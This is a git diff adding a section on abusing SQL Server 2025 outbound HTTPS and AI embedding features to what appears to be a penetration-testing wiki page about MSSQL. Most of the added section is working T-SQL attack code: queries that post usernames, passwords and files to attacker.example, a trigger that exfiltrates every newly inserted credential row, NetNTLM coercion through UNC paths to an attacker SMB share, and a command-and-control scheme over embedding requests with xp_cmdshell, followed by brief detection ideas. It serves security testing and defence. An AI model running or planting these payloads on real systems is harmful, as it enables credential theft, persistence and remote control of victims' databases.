diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 7a76af2b0a0..a2d388f28fc 100644 --- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -504,6 +504,133 @@ SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTE https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))-- ``` + +### SQL Server 2025 AI / REST abuse + +SQL Server 2025 adds **database-native outbound HTTPS** and **external embedding model** support, which creates new exfiltration, coercion, persistence, and C2 primitives. + +#### `sp_invoke_external_rest_endpoint` for HTTPS exfiltration + +Useful constraints before abusing it: + +- Disabled by default on **SQL Server 2025**. A user with **`ALTER SETTINGS`** (commonly `sysadmin` / `serveradmin`) must enable it: + +```sql +EXECUTE sp_configure 'external rest endpoint enabled', 1; +RECONFIGURE WITH OVERRIDE; +``` + +- The caller needs **`EXECUTE ANY EXTERNAL ENDPOINT`**. +- Requests must use **HTTPS/TLS** with a valid certificate chain. +- Sent/received payloads can reach **100 MB**, making chunked table dumps practical. + +Serialize rows with `FOR JSON AUTO` and send them directly from the SQL Server process: + +```sql +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = ( + SELECT username, password + FROM dbo.app_users + FOR JSON AUTO +); +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/collect', + @method = 'POST', + @payload = @payload; +``` + +Because the network origin is the **database engine**, this is quieter than dropping a separate implant or calling PowerShell. + +#### File exfiltration via `OPENROWSET` + REST endpoint + +If the SQL Server service account can read a file, combine `OPENROWSET(BULK ...)` with the REST primitive to exfiltrate it over HTTPS: + +```sql +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = BulkColumn +FROM OPENROWSET(BULK N'C:\Windows\System32\drivers\etc\hosts', SINGLE_CLOB) AS x; +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/files?name=hosts.txt', + @method = 'POST', + @headers = N'{"Content-Type":"text/plain"}', + @payload = @payload; +``` + +#### Persistent row exfiltration with triggers + +Instead of repeatedly dumping a table, weaponize an `AFTER INSERT` trigger so new rows are posted automatically: + +```sql +CREATE TRIGGER tr_exfil_users ON dbo.app_users AFTER INSERT AS +DECLARE @payload NVARCHAR(MAX); +SELECT @payload = (SELECT username, password FROM inserted FOR JSON AUTO); +EXEC sp_invoke_external_rest_endpoint + @url = N'https://attacker.example/collect', + @method = 'POST', + @payload = @payload; +``` + +This is a **database-resident persistence** primitive for future credential or secret capture. + +#### `CREATE EXTERNAL MODEL` / `AI_GENERATE_EMBEDDINGS` + +`CREATE EXTERNAL MODEL` stores an embedding endpoint definition inside the database. `AI_GENERATE_EMBEDDINGS` then sends attacker-controlled strings to that endpoint and returns the JSON vector response. + +```sql +CREATE EXTERNAL MODEL attacker_model +WITH ( + LOCATION = N'https://attacker.example/v1/embeddings', + API_FORMAT = 'OpenAI', + MODEL_TYPE = EMBEDDINGS, + MODEL = N'mock-embedding-model' +); +SELECT AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL attacker_model); +``` + +Useful permission notes: + +- Creating/altering models requires **`CREATE EXTERNAL MODEL`** or **`ALTER ANY EXTERNAL MODEL`**. +- A principal needs **`EXECUTE`** on the external model to use it. +- `AI_GENERATE_EMBEDDINGS` also depends on **`external rest endpoint enabled`**. + +#### NetNTLM coercion via ONNX Runtime UNC paths + +If ONNX external models are enabled, `LOCATION` and `LOCAL_RUNTIME_PATH` can point to a **UNC path**. When the model is invoked, SQL Server tries to access the attacker SMB share and authenticates before the runtime initialization fails. + +```sql +EXEC sp_configure 'show advanced options', 1; RECONFIGURE; +EXEC sp_configure 'external AI runtimes enabled', 1; RECONFIGURE; +ALTER DATABASE SCOPED CONFIGURATION SET PREVIEW_FEATURES = ON; +CREATE EXTERNAL MODEL onnx_unc_test +WITH ( + LOCATION = N'\\attacker\share', + LOCAL_RUNTIME_PATH = N'\\attacker\share', + API_FORMAT = 'ONNX Runtime', + MODEL_TYPE = EMBEDDINGS, + MODEL = 'test' +); +SELECT AI_GENERATE_EMBEDDINGS(N'test' USE MODEL onnx_unc_test); +``` + +This behaves like other coercion gadgets, but the trigger is an **AI model invocation** instead of `xp_dirtree`. + +#### C2 over embedding traffic + +An attacker-controlled HTTPS service can impersonate an **OpenAI-compatible embeddings endpoint**. A T-SQL loop (or an **UNSAFE CLR** assembly loaded from hex) can: + +- check in with `AI_GENERATE_EMBEDDINGS(N'checkin' USE MODEL )` +- parse tasking with `OPENJSON` +- execute OS commands with `xp_cmdshell` **or** directly via CLR / `CreateProcessW` +- send command output back in another embedding request + +This turns normal-looking embedding traffic into a **database-native C2 transport**. + +#### Detection ideas + +- Query **`sys.external_models`** and alert on `CREATE/ALTER/DROP EXTERNAL MODEL`. +- Monitor enablement of **`external rest endpoint enabled`** and **`external AI runtimes enabled`**. +- If you use SQL Audit / XEvents, capture the SQL text for these statements and review **`external_rest_endpoint_summary`** and **`ai_generate_embeddings_summary`** events. + ### **RCE/Read files executing scripts (Python and R)** MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp_cmdshell** to execute commands. @@ -781,6 +908,11 @@ You probably will be able to **escalate to Administrator** following one of thes - [HTB: DarkZero - linked-server credential mapping to cross-forest RCE](https://0xdf.gitlab.io/2026/04/04/htb-darkzero.html) - [HTB: Signed - MSSQL coercion to silver ticket sysadmin](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) - [Microsoft Learn - sp_helplinkedsrvlogin (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-helplinkedsrvlogin-transact-sql) +- [SpecterOps - Oops, I Weaponized the Database: Abusing AI Features in SQL Server 2025](https://specterops.io/blog/2026/06/10/oops-i-weaponized-the-database-abusing-ai-features-in-mssql-2025) +- [gershsec/mssql2025-poc](https://github.com/gershsec/mssql2025-poc) +- [Microsoft Learn - sp_invoke_external_rest_endpoint (Transact-SQL)](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-invoke-external-rest-endpoint-transact-sql?view=sql-server-ver17) +- [Microsoft Learn - CREATE EXTERNAL MODEL (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-external-model-transact-sql?view=sql-server-ver17) +- [Microsoft Learn - AI_GENERATE_EMBEDDINGS (Transact-SQL)](https://learn.microsoft.com/en-us/sql/t-sql/functions/ai-generate-embeddings-transact-sql?view=sql-server-ver17) - [https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users](https://stackoverflow.com/questions/18866881/how-to-get-the-list-of-all-database-users) - [https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/](https://www.mssqltips.com/sqlservertip/6828/sql-server-login-user-permissions-fn-my-permissions/) - [https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)